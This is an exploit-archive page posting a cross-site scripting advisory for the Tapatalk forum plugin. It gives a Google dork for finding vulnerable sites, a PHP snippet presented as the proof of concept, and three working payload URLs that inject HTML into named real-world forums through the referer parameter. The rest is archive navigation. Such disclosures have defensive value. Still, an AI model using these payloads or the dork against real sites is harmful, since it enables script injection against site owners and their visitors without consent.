Tapatalk Forum Cross Site Scripting

Tapatalk Forum Cross Site Scripting: Posted Apr 27, 2014; Authored by E. Burtay Sahin; Tapatalk Forum suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 253cd5c79575f7fb9259f5fda766b097a52ff591c1badea81b43b1012790918a; Download | Favorite | View

Tapatalk Forum Cross Site Scripting

##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ \_________ _
 __  / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
\____/\__,_/_/ /_/_/____/____/\__,_/_/  /_/\___/____(_)____/_/   \__, /  
                                                                /____/   
Janissaries.Org                                
################################################################################## 

Exploit Title  : Tapatalk Universal Forum Application XSS Vulnerability (All Version)
Author      : E. Burtay Sahin
Author Mail    : admin@burtay.org 
Author Homepage : http://www.burtay.org
Community Hpage  : http://www.janissaries.org
Google Dork    : inurl:mobiquo
Vendor Homepage  : http://tapatalk.com/
Software Link  : http://tapatalk.com/activate_tapatalk.php
Version      : All Version

##################################################################################

P0C
$ads_url = $protocol.'tapatalk.com/welcome_screen.php'
    .'?referer='.urlencode($referer)
    .'&code='.urlencode($code)
    .'&board_url='.urlencode($board_url)
    .'&lang='.urlencode($lang)
    .$byo
    .'&callback=?';
<?php echo $ads_url; ?>

##################################################################################
3 Live Examples

1.)Version ip34_3.8.2
https://forums.plex.tv/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr

2.)Version vb3x_4.3.2
http://forum.xda-developers.com/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr

3.)Version pb30_4.4.0
http://www.passion-multirotor.fr/forum/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 61 files
Debian 34 files
Gentoo 32 files
LiquidWorm 10 files
nu11secur1ty 7 files
malvuln 5 files
Adam Gowdiak 4 files
liquidsky 3 files
kai6u 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,038)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,580)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,745)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,490)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

Tapatalk Forum Cross Site Scripting

Tapatalk Forum Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Tapatalk Forum Cross Site Scripting

Share This

Tapatalk Forum Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems